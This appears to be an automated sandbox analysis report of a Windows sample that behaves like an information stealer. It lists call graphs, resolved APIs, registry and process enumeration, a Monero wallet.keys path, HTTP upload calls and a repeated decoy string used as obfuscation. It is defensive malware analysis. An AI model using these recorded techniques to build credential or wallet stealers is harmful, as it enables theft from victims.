3389f0 2 API calls 15451->15457 15454 338022 15452->15454 15461 337fe3 15452->15461 15455 332194 15454->15455 15458 3389f0 2 API calls 15454->15458 15455->14858 15459 33807b 15457->15459 15458->15455 15459->15454 15460 338084 wsprintfA 15459->15460 15460->15455 15461->15450 15461->15455 15544 3389f0 15461->15544 15547 338a10 GetProcessHeap RtlAllocateHeap 15461->15547 15463 33220f 15462->15463 15463->14872 15465 3389b0 15464->15465 15466 33814d GlobalMemoryStatusEx 15465->15466 15469 338163 __aulldiv 15466->15469 15467 33819b wsprintfA 15468 332289 15467->15468 15468->14886 15469->15467 15471 3387fb GetProcessHeap RtlAllocateHeap wsprintfA 15470->15471 15473 33a740 lstrcpy 15471->15473 15474 33230b 15473->15474 15474->14900 15476 33a740 lstrcpy 15475->15476 15482 338229 15476->15482 15477 338263 15478 33a7a0 lstrcpy 15477->15478 15480 3382dc 15478->15480 15479 33a9b0 lstrcpy lstrlen lstrcpy lstrcat 15479->15482 15480->14917 15481 33a8a0 lstrcpy 15481->15482 15482->15477 15482->15479 15482->15481 15484 33a740 lstrcpy 15483->15484 15485 33835c RegOpenKeyExA 15484->15485 15486 3383d0 15485->15486 15487 3383ae 15485->15487 15489 338613 RegCloseKey 15486->15489 15490 3383f8 RegEnumKeyExA 15486->15490 15488 33a7a0 lstrcpy 15487->15488 15499 3383bd 15488->15499 15493 33a7a0 lstrcpy 15489->15493 15491 33843f wsprintfA RegOpenKeyExA 15490->15491 15492 33860e 15490->15492 15494 3384c1 RegQueryValueExA 15491->15494 15495 338485 RegCloseKey RegCloseKey 15491->15495 15492->15489 15493->15499 15497 338601 RegCloseKey 15494->15497 15498 3384fa lstrlen 15494->15498 15496 33a7a0 lstrcpy 15495->15496 15496->15499 15497->15492 15498->15497 15500 338510 15498->15500 15499->14943 15501 33a9b0 4 API calls 15500->15501 15502 338527 15501->15502 15503 33a8a0 lstrcpy 15502->15503 15504 338533 15503->15504 15505 33a9b0 4 API calls 15504->15505 15506 338557 15505->15506 15507 33a8a0 lstrcpy 15506->15507 15508 338563 15507->15508 15509 33856e RegQueryValueExA 15508->15509 15509->15497 15510 3385a3 15509->15510 15511 33a9b0 4 API calls 15510->15511 15512 3385ba 15511->15512 15513 33a8a0 lstrcpy 15512->15513 15514 3385c6 15513->15514 15515 33a9b0 4 API calls 15514->15515 15516 3385ea 15515->15516 15517 33a8a0 lstrcpy 15516->15517 15518 3385f6 15517->15518 15518->15497 15520 33a740 lstrcpy 15519->15520 15521 3386bc CreateToolhelp32Snapshot Process32First 15520->15521 15522 3386e8 Process32Next 15521->15522 15523 33875d CloseHandle 15521->15523 15522->15523 15528 3386fd 15522->15528 15524 33a7a0 lstrcpy 15523->15524 15526 338776 15524->15526 15525 33a8a0 lstrcpy 15525->15528 15526->14975 15527 33a9b0 lstrcpy lstrlen lstrcpy lstrcat 15527->15528 15528->15522 15528->15525 15528->15527 15530 33a7a0 lstrcpy 15529->15530 15531 3351b5 15530->15531 15532 321590 lstrcpy 15531->15532 15533 3351c6 15532->15533 15548 325100 15533->15548 15535 3351cf 15535->14987 15539 337720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15536->15539 15538 3376b9 15538->15411 15538->15412 15540 337780 RegCloseKey 15539->15540 15541 337765 RegQueryValueExA 15539->15541 15542 337793 15540->15542 15541->15540 15542->15538 15543->15423 15545 3389f9 GetProcessHeap HeapFree 15544->15545 15546 338a0c 15544->15546 15545->15546 15546->15461 15547->15461 15549 33a7a0 lstrcpy 15548->15549 15550 325119 15549->15550 15551 3247b0 2 API calls 15550->15551 15552 325125 15551->15552 15708 338ea0 15552->15708 15554 325184 15555 325192 lstrlen 15554->15555 15556 3251a5 15555->15556 15557 338ea0 4 API calls 15556->15557 15558 3251b6 15557->15558 15559 33a740 lstrcpy 15558->15559 15560 3251c9 15559->15560 15561 33a740 lstrcpy 15560->15561 15562 3251d6 15561->15562 15563 33a740 lstrcpy 15562->15563 15564 3251e3 15563->15564 15565 33a740 lstrcpy 15564->15565 15566 3251f0 15565->15566 15567 33a740 lstrcpy 15566->15567 15568 3251fd InternetOpenA StrCmpCA 15567->15568 15569 32522f 15568->15569 15570 3258c4 InternetCloseHandle 15569->15570 15571 338b60 3 API calls 15569->15571 15577 3258d9 ctype 15570->15577 15572 32524e 15571->15572 15573 33a920 3 API calls 15572->15573 15574 325261 15573->15574 15575 33a8a0 lstrcpy 15574->15575 15576 32526a 15575->15576 15578 33a9b0 4 API calls 15576->15578 15580 33a7a0 lstrcpy 15577->15580 15579 3252ab 15578->15579 15581 33a920 3 API calls 15579->15581 15589 325913 15580->15589 15582 3252b2 15581->15582 15583 33a9b0 4 API calls 15582->15583 15584 3252b9 15583->15584 15585 33a8a0 lstrcpy 15584->15585 15586 3252c2 15585->15586 15587 33a9b0 4 API calls 15586->15587 15588 325303 15587->15588 15590 33a920 3 API calls 15588->15590 15589->15535 15591 32530a 15590->15591 15592 33a8a0 lstrcpy 15591->15592 15593 325313 15592->15593 15594 325329 InternetConnectA 15593->15594 15594->15570 15595 325359 HttpOpenRequestA 15594->15595 15597 3258b7 InternetCloseHandle 15595->15597 15598 3253b7 15595->15598 15597->15570 15599 33a9b0 4 API calls 15598->15599 15600 3253cb 15599->15600 15601 33a8a0 lstrcpy 15600->15601 15602 3253d4 15601->15602 15603 33a920 3 API calls 15602->15603 15604 3253f2 15603->15604 15605 33a8a0 lstrcpy 15604->15605 15606 3253fb 15605->15606 15607 33a9b0 4 API calls 15606->15607 15608 32541a 15607->15608 15609 33a8a0 lstrcpy 15608->15609 15610 325423 15609->15610 15611 33a9b0 4 API calls 15610->15611 15612 325444 15611->15612 15613 33a8a0 lstrcpy 15612->15613 15614 32544d 15613->15614 15615 33a9b0 4 API calls 15614->15615 15616 32546e 15615->15616 15617 33a8a0 lstrcpy 15616->15617 15709 338ead CryptBinaryToStringA 15708->15709 15713 338ea9 15708->15713 15710 338ece GetProcessHeap RtlAllocateHeap 15709->15710 15709->15713 15711 338ef4 ctype 15710->15711 15710->15713 15712 338f05 CryptBinaryToStringA 15711->15712 15712->15713 15713->15554 15717->14990 15960 329880 15718->15960 15720 3298e1 15720->14997 15722 33a740 lstrcpy 15721->15722 15723 32fb16 15722->15723 15895 33a740 lstrcpy 15894->15895 15896 330266 15895->15896 15897 338de0 2 API calls 15896->15897 15898 33027b 15897->15898 15899 33a920 3 API calls 15898->15899 15900 33028b 15899->15900 15901 33a8a0 lstrcpy 15900->15901 15902 330294 15901->15902 15903 33a9b0 4 API calls 15902->15903 15904 3302b8 15903->15904 15905 33a8a0 lstrcpy 15904->15905 15961 32988e 15960->15961 15964 326fb0 15961->15964 15963 3298ad ctype 15963->15720 15967 326d40 15964->15967 15968 326d63 15967->15968 15979 326d59 15967->15979 15968->15979 15981 326660 15968->15981 15970 326dbe 15970->15979 15987 3269b0 15970->15987 15972 326e2a 15973 326ee6 VirtualFree 15972->15973 15975 326ef7 15972->15975 15972->15979 15973->15975 15974 326f41 15976 3389f0 2 API calls 15974->15976 15974->15979 15975->15974 15977 326f26 FreeLibrary 15975->15977 15978 326f38 15975->15978 15976->15979 15977->15975 15980 3389f0 2 API calls 15978->15980 15979->15963 15980->15974 15986 32668f VirtualAlloc 15981->15986 15983 326730 15984 326743 VirtualAlloc 15983->15984 15985 32673c 15983->15985 15984->15985 15985->15970 15986->15983 15986->15985 15988 3269c9 15987->15988 15992 3269d5 15987->15992 15989 326a09 LoadLibraryA 15988->15989 15988->15992 15990 326a32 15989->15990 15989->15992 15994 326ae0 15990->15994 15997 338a10 GetProcessHeap RtlAllocateHeap 15990->15997 15992->15972 15993 326ba8 GetProcAddress 15993->15992 15993->15994 15994->15992 15994->15993 15995 3389f0 2 API calls 15995->15994 15996 326a8b 15996->15992 15996->15995 15997->15996

                              Executed Functions

                              Function 00339860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 339860-339874 call 339750 663 339a93-339af2 LoadLibraryA * 5 660->663 664 33987a-339a8e call 339780 GetProcAddress * 21 660->664 666 339af4-339b08 GetProcAddress 663->666 667 339b0d-339b14 663->667 664->663 666->667 669 339b46-339b4d 667->669 670 339b16-339b41 GetProcAddress * 2 667->670 671 339b68-339b6f 669->671 672 339b4f-339b63 GetProcAddress 669->672 670->669 673 339b71-339b84 GetProcAddress 671->673 674 339b89-339b90 671->674 672->671 673->674 675 339b92-339bbc GetProcAddress * 2 674->675 676 339bc1-339bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,010922F0), ref: 003398A1
                              • GetProcAddress.KERNEL32(74DD0000,01092218), ref: 003398BA
                              • GetProcAddress.KERNEL32(74DD0000,01092248), ref: 003398D2
                              • GetProcAddress.KERNEL32(74DD0000,010922A8), ref: 003398EA
                              • GetProcAddress.KERNEL32(74DD0000,01092350), ref: 00339903
                              • GetProcAddress.KERNEL32(74DD0000,01099258), ref: 0033991B
                              • GetProcAddress.KERNEL32(74DD0000,010858D0), ref: 00339933
                              • GetProcAddress.KERNEL32(74DD0000,01085930), ref: 0033994C
                              • GetProcAddress.KERNEL32(74DD0000,01092410), ref: 00339964
                              • GetProcAddress.KERNEL32(74DD0000,010924E8), ref: 0033997C
                              • GetProcAddress.KERNEL32(74DD0000,01092368), ref: 00339995
                              • GetProcAddress.KERNEL32(74DD0000,010924A0), ref: 003399AD
                              • GetProcAddress.KERNEL32(74DD0000,01085970), ref: 003399C5
                              • GetProcAddress.KERNEL32(74DD0000,01092230), ref: 003399DE
                              • GetProcAddress.KERNEL32(74DD0000,01092440), ref: 003399F6
                              • GetProcAddress.KERNEL32(74DD0000,01085710), ref: 00339A0E
                              • GetProcAddress.KERNEL32(74DD0000,010923B0), ref: 00339A27
                              • GetProcAddress.KERNEL32(74DD0000,01092260), ref: 00339A3F
                              • GetProcAddress.KERNEL32(74DD0000,010859D0), ref: 00339A57
                              • GetProcAddress.KERNEL32(74DD0000,01092278), ref: 00339A70
                              • GetProcAddress.KERNEL32(74DD0000,01085950), ref: 00339A88
                              • LoadLibraryA.KERNEL32(01092320,?,00336A00), ref: 00339A9A
                              • LoadLibraryA.KERNEL32(010922D8,?,00336A00), ref: 00339AAB
                              • LoadLibraryA.KERNEL32(01092488,?,00336A00), ref: 00339ABD
                              • LoadLibraryA.KERNEL32(01092458,?,00336A00), ref: 00339ACF
                              • LoadLibraryA.KERNEL32(01092308,?,00336A00), ref: 00339AE0
                              • GetProcAddress.KERNEL32(75A70000,01092380), ref: 00339B02
                              • GetProcAddress.KERNEL32(75290000,010923C8), ref: 00339B23
                              • GetProcAddress.KERNEL32(75290000,010923E0), ref: 00339B3B
                              • GetProcAddress.KERNEL32(75BD0000,010923F8), ref: 00339B5D
                              • GetProcAddress.KERNEL32(75450000,01085870), ref: 00339B7E
                              • GetProcAddress.KERNEL32(76E90000,01099138), ref: 00339B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00339BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00339BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: dd220eb37253dba0ede648c46119a4b17aa9cc9909e4b7f412382006a46feed0
                              • Instruction ID: 1d85f697bb00605e3b4369793eab4829fbaff850c1f9c604847c5ae749dd5086
                              • Opcode Fuzzy Hash: dd220eb37253dba0ede648c46119a4b17aa9cc9909e4b7f412382006a46feed0
                              • Instruction Fuzzy Hash: F3A14EB55002409FD348EFACEE88A5637F9F7AC301704451AE605E3265D7F9A84AFF62
                              Function 003245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 3245c0-324695 RtlAllocateHeap 781 3246a0-3246a6 764->781 782 32474f-3247a9 VirtualProtect 781->782 783 3246ac-32474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0032460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0032479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 23bc78dbe477b4275151f0618462f834fc9b18ecadc2aef053ea48677b4b676e
                              • Instruction ID: 3f00b7e199d9729fe6e35feafda4d9936ea6dec5d02bbb43ad9f41cbcb3b6b72
                              • Opcode Fuzzy Hash: 23bc78dbe477b4275151f0618462f834fc9b18ecadc2aef053ea48677b4b676e
                              • Instruction Fuzzy Hash: B5415A20FD26047BC636FBA4AC7EEDD729E5F52B00F48D0C0ECE85A291CBB06580459B
                              Function 00324880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 324880-324942 call 33a7a0 call 3247b0 call 33a740 * 5 InternetOpenA StrCmpCA 816 324944 801->816 817 32494b-32494f 801->817 816->817 818 324955-324acd call 338b60 call 33a920 call 33a8a0 call 33a800 * 2 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a920 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a920 call 33a8a0 call 33a800 * 2 InternetConnectA 817->818 819 324ecb-324ef3 InternetCloseHandle call 33aad0 call 329ac0 817->819 818->819 905 324ad3-324ad7 818->905 829 324f32-324fa2 call 338990 * 2 call 33a7a0 call 33a800 * 8 819->829 830 324ef5-324f2d call 33a820 call 33a9b0 call 33a8a0 call 33a800 819->830 830->829 906 324ae5 905->906 907 324ad9-324ae3 905->907 908 324aef-324b22 HttpOpenRequestA 906->908 907->908 909 324b28-324e28 call 33a9b0 call 33a8a0 call 33a800 call 33a920 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a920 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a920 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a9b0 call 33a8a0 call 33a800 call 33a920 call 33a8a0 call 33a800 call 33a740 call 33a920 * 2 call 33a8a0 call 33a800 * 2 call 33aad0 lstrlen call 33aad0 * 2 lstrlen call 33aad0 HttpSendRequestA 908->909 910 324ebe-324ec5 InternetCloseHandle 908->910 1021 324e32-324e5c InternetReadFile 909->1021 910->819 1022 324e67-324eb9 InternetCloseHandle call 33a800 1021->1022 1023 324e5e-324e65 1021->1023 1022->910 1023->1022 1024 324e69-324ea7 call 33a9b0 call 33a8a0 call 33a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00324915
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 0032493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00324ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00340DDB,00000000,?,?,00000000,?,",00000000,?,0109E8B8), ref: 00324DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00324E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00324E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00324E49
                              • InternetCloseHandle.WININET(00000000), ref: 00324EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00324EC5
                              • HttpOpenRequestA.WININET(00000000,0109E828,?,0109E398,00000000,00000000,00400100,00000000), ref: 00324B15
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • InternetCloseHandle.WININET(00000000), ref: 00324ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
